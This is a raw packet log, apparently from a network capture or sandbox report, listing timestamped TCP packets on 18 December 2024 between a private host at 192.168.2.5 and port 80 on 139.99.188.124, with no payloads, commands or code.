                                                                    Dec 18, 2024 09:13:21.800885916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.800971031 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.801646948 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.801759958 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.801816940 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.802495003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.802519083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.802578926 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.803354979 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.803472042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.803531885 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.804233074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.804367065 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.804421902 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.805119038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.805242062 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.805309057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.805993080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.806101084 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.806154013 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.806845903 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.806982040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.807570934 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.807693005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.807804108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.807905912 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.808542967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.808634043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.808865070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.809427977 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.809556007 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.809616089 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.810296059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.810410023 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.810467005 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.811217070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.811412096 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.811472893 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.812077045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.812141895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.812247038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.812907934 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813107014 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813163996 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.813817024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813896894 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.813955069 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.814682961 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.814707041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.814763069 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.815509081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.815665960 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.815721035 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.816365957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.816485882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.816540956 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.817225933 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.817357063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.817420006 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.818100929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.818206072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.818336010 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.819031000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.819116116 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.819175005 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.819850922 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.819962025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.820020914 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.820689917 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.820766926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.820828915 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.821619034 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.821743011 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.821800947 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.822457075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.822561026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.822802067 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.823296070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.823508978 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.823576927 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.824191093 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.824351072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.824479103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.825040102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.825164080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.825222015 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.825911999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826039076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826112986 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.826793909 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826919079 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.826992035 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.827650070 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.827851057 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.827908993 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.828511000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.828614950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.828674078 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.829377890 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.829513073 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.829653025 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.830252886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.830322981 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.830535889 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.831123114 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.831373930 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.831439018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.832027912 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832145929 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832204103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.832855940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832880974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.832940102 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.833759069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.833782911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.833841085 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.834626913 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.834717989 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.834779024 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.835474968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.835552931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.835695982 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.836328030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.836424112 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.836479902 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.837183952 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.837249041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.837311983 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.838123083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.838262081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.838416100 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.838943005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.839046955 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.839107990 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.839762926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.947637081 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.985574007 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.985635042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.985882998 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.985915899 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.986006975 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.986090899 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.986771107 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.986879110 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.987018108 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.987610102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.987663031 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.987725973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.988476992 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.988646030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.988833904 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.989365101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.989471912 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.989518881 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.990216017 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.990317106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.990376949 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.991081953 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.991184950 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.991602898 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.991955042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.992090940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.992181063 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.992822886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.992947102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.993166924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.993686914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.993792057 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.993943930 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.994545937 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.994652987 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.994703054 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.995472908 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.995572090 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.995754957 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.996329069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.996397018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.996447086 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.997241974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.997347116 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.997406960 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.998023033 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.998182058 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.998697042 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.998877048 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.999197006 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.999243975 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:21.999749899 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:21.999855995 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.000273943 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.000611067 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.000679016 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.000782013 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.001533985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.001728058 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.001780987 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.002475977 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.002556086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.003012896 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.003211021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.003334045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.003379107 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.004091024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.004154921 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.004219055 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.004966021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.005132914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.005332947 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.005820036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.005942106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.006129026 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.006694078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.006788015 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.006968975 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.007546902 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.007678986 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.007843018 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.008440971 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.008563995 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.008621931 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.009298086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.009398937 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.009572029 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.010149002 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.010253906 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.010303974 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.011075020 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.011157036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.011271954 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.011892080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.012023926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.012099028 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.012801886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.012897015 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.013011932 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.013645887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.013740063 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.013937950 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.014503956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.014605045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.014664888 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.015356064 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.015476942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.015815973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.016438961 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.016558886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.016649961 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.017096043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.017246008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.017304897 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.017965078 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.018068075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.018260956 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.018831968 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.018946886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.019098043 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.019700050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.019807100 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.019867897 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.020569086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.020668030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.020823956 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.021445990 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.021660089 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.021771908 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.022439957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.022542000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.022619963 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.023169041 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.023273945 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.023423910 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.024040937 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.024210930 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.024274111 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.024903059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.025023937 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.025517941 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.025774956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.025876999 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.026402950 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.026637077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.026768923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.026840925 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.027527094 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.027636051 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.027760983 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.028374910 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.028476000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.028670073 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.029232025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.029344082 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.029400110 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.030127048 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.030256033 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.030306101 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.030947924 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.074928999 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.176853895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.177138090 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.177203894 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.177547932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.177563906 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.177608013 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.178090096 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.178268909 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.178309917 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.179007053 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.179193020 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.179244995 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.179707050 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.179723024 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.179773092 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.180716038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.180893898 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.180974007 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.181610107 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.181653976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.181699038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.182404995 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.182578087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.182625055 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.183306932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.183500051 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.183543921 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.184022903 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.184231043 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.184269905 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.184971094 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.185134888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.185174942 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.185772896 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.186086893 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.186125994 CET4972980192.168.2.5139.99.188.124
